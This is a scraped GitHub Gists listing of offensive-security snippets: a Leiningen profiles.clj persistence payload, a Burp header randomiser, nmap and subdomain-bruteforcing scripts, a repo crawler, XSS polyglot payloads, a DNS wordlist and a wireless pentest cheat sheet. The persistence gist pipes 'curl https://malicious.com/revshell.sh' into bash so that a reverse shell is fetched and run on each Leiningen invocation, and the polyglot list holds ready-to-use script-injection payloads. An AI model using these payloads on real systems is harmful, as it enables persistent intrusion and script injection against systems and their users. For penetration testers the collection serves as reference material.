Skip to content

Instantly share code, notes, and snippets.

View vavkamil's full-sized avatar
✌️
Hack The Planet !

Kamil Vavra vavkamil

✌️
Hack The Planet !
611 followers · 49 following
View GitHub Profile
@mthbernardes
mthbernardes / payload.edn
Last active February 25, 2022 12:00
persistence using Leiningen profiles.clj
;;Adding the following payload on $HOME/.lein/profiles.clj map makes Leiningen (https://leiningen.org)
;;work as a post exploitation persistence.
{:whatever-name-you-want #=(eval
(do
(use '[clojure.java.shell :only [sh]])
(require '[clojure.java.shell :as shell])
(shell/sh "bash" "-c" "curl https://malicious.com/revshell.sh | bash")))}
@nickpopovich
nickpopovich / random_user-agent.py
Created January 1, 2020 21:04
Script that goes with Python Scripter Burp Extension - every request passed through burp has a random User-Agent. Inspired by Marcin Wielgoszewski (@marcin) https://portswigger.net/bappstore/eb563ada801346e6bdb7a7d7c5c52583. Also inspired by Tim Tomes' (@lanmaster53) example scripts for Python Scripter https://gist.github.com/lanmaster53/3d86836…
import random
header_names = ['User-Agent']
ua = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0; CAM-L21 Build/HUAWEICAM-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/62.0.3202.84 Mobile Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36']
if (messageIsRequest):
request = helpers.analyzeRequest(messageInfo)
headers = request.getHeaders()
for header_name in header_names:
@JonathanLPoch
JonathanLPoch / nmap-diff.sh
Last active October 4, 2022 15:56
Lightweight Nmap Topology Scanning
#!/bin/sh
DEFAULTNMAPOPTIONS="-T4 -sV -Pn --top-ports 5000 -R"
NMAPOPTIONS="$DEFAULTNMAPOPTIONS"
die() {
printf '\033[38;5;9m%s\033[0m\n\n' "$1" >&2
display_usage
exit 1
}
@coreygo
coreygo / cyber.md
Last active November 8, 2022 14:43
@marzavec
marzavec / run.js
Created August 8, 2019 16:43
Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
/*
Developer: Marzavec ( https://github.com/marzavec )
Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done.
Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz.
*/
const rootTld = 'lyka.pro'; // change to your target's root tld
// url to newline seperated wordlist
const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt';
@pascalschulz
pascalschulz / getGithubRepoCloneUrls.py
Last active November 12, 2020 13:42
This code snippet takes a Github organization name as input, crawls for all its public repositories and returns a list of all the "Git clone URLs" for those repos.
import itertools
import re
import requests as rq
# Your Github organization (e.g. /Github)
organization = "/<company_name>"
response = rq.request("GET", "https://github.com{0}".format(organization))
try:
@EdOverflow
EdOverflow / hiring.txt
Created May 18, 2019 10:22
$ curl -s "https://crawler.ninja/files/security-txt-values.txt" | grep -i "hiring: http" | sed 's/^#//g' | awk '{print $2}'
https://www.tumblr.com/jobs
https://kariera.shoptet.cz/
https://g.co/SecurityPrivacyEngJobs
https://www.shopify.com/careers
https://solarwinds.jobs
https://www.chcidozootu.cz/it-devel/
https://careerssearch.bbc.co.uk/jobs/search
https://www.npmjs.com/jobs
https://grab.careers/
@michenriksen
michenriksen / xss-polyglots.txt
Created October 31, 2018 14:10
XSS Polyglot payloads
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>
javascript:`</template>\"///"//<
@jhaddix
jhaddix / all.txt
Last active January 27, 2026 02:14
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created July 2, 2016 18:30
Wireless Penetration Testing Cheat Sheet

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up